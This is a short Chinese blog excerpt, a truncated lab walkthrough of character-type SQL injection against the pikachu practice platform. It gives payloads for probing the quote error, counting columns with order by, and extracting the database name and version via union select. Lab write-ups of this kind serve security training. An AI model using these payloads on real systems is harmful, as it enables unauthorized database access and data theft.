奋斗钢笔

文章
6
资源
0
加入时间
2年10月20天

pikachu字符型注入

1.字符型注入吧。直接就 1' 报错了2.存在字符型注入3. 1' order by 1# 和 1' order by 2# 返回正常 3时报错。这样就知道了,字段数为2,两列数据4. 确定一下字段的显示位置嘛。1' union select 1,2#5.查一下数据库名1' union select database(),version()# /**数据库名和版本**/只有数据库5.0以上的版本,才会存在i...